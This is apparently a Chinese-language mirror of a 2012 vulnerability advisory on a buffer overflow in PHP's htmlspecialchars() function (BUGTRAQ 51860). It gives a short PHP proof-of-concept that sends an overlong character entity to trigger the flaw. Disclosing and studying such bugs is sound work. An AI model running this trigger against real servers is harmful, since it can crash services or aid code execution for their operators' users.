Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / PHP “htmlspecialchars()”缓冲区溢出漏洞

发布日期:2012-02-03
更新日期:2012-02-06受影响系统:
PHP PHP
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51860PHP是一种在电脑上运行的脚本语言,主要用途是在于处理动态网页,包含了命令行运行接口或者产生图形用户界面程序。PHP在带有$double=false的htmlspecialchars()函数的实现上存在缓冲区溢出漏洞,因为起始位置仅允许40个字节,攻击者可利用此漏洞在PHP进程中执行任意代码,使Web Server崩溃,拒绝服务合法用户。<*来源:cataphract
 
  链接:https://bugs.php.net/bug.php?id=60965
*>测试方法:
--------------------------------------------------------------------------------
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<?php
echo
htmlspecialchars(""""""""""""""""""""""""""""""""""""""""""""""&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005;",
ENT_QUOTES, "UTF-8", false), " ";建议:
--------------------------------------------------------------------------------
厂商补丁:PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.php.net中文版Putty 后门分析 竟然记录所有使用Putty 登陆服务器的地址 账号和密码Mozilla Firefox IPv6文字语法跨域信息泄露漏洞相关资讯      PHP  PHP漏洞 
  • PHP "ext/zip/php_zip.c"释放后重  (今 07:48)
  • PHP "ext/standard/file.c" 远程拒  (09月12日)
  • PHP "php_html_entities()" 函数整  (09月11日)
  • PHP ext/session/session.c对象注  (09月14日)
  • PHP "libxml_disable_entity_  (09月11日)
  • PHP "soap/php_http.c" 远程拒绝服  (09月11日)
本文评论 查看全部评论 (0)
表情: 姓名: 字数